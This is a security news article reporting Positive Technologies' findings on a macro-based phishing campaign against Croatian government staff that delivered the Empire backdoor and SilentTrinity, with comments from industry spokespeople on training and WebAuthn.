According to security researchers at Positive Technologies, a secretive hacker group has targeted, and possibly infected the systems of, Croatian government employees between February and April this year.
In a blog post, researchers said that emails contained a link to a remote website with a lookalike URL, where users were asked to download an Excel document.
Inside the document are commands that create a Visual Basic script that, when run establishes a WebDAV network connection, and downloads and runs the file for the next stage of infection, with the help of the legitimate system utility regsvr32. Researchers said that parts of the script may be borrowed from third-party sources.
The macro script, if enabled by the victim, would download and install malware. The first malware downloaded was the Empire Backdoor, which enables remotely controlling a victim's computer and is part of the Empire Framework post-exploitation framework.
Another piece of malware downloaded was SilentTrinity. Researchers said that this is the first time this malware has been used by hackers in an active campaign.
SC previously reported that SilentTrinity was developed by Marcello Salvati (a researcher at Black Hills Information Security) in October 2018 and uploaded to Github and also created IronPython. In correction Salvati has tweeted: "I did not create IronPython & I did not do the research on the actual Malware, Alexey Vishnyakov did at @ptsecurity."
Researchers said that the attack is fileless and does not require disk space: dependencies, scripts, and tasks all reside in RAM. All C2 traffic is encrypted with AES, including the archive with dependencies, tasks, and command output.
They added that the the domain names used in the attack were chosen to resemble those of legitimate sites.
"Such names would presumably arouse less suspicion among phishing targets. Not all the impersonated domains related to Croatia," said researchers.
"All attacker domains were registered with WhoisGuard privacy protection. Ordinarily used to protect domain owners from spam by hiding personal information, this feature helped the attackers to remain anonymous."
According to researchers, the day after detection of the malicious documents, a press release was issued in which the Croatian Information Systems Security Bureau raised the alarm about targeted phishing attacks.
"Traces were discovered on multiple Croatian government systems. According to the press release, the victims received emails with links to a phishing site. There they were prompted to download a malicious document, which was the jumping-off point of our analysis," said researchers.
Javvad Malik, security awareness advocate at KnowBe4, told SC Media UK that while this attack has malware embedded in a document, it is largely reliant on being able to trick users into clicking the phishing link to the document as well as having macros enabled to automatically run.
"This is why user awareness training plays such an important role in preventing phishing and other social engineering attacks from being successful," he said.
Stuart Sharp, global director of solution engineering at OneLogin, told SC Media UK that as phishing becomes increasingly sophisticated, businesses should urgently upgrade the security of core applications and administrative accounts by introducing more modern forms of 2FA like WebAuthn which leverages device-based encryption to prevent even advanced malware and man-in-the-middle phishing attacks.
"WebAuthn is popular with end users because it requires no password and allows them to utilise biometric sensors like fingerprint scanning and facial recognition that they already use to their unlock phones," he said.
Is Zero Trust really achievable given the complexity in finance service organisations?
Brought to you in partnership with Forescout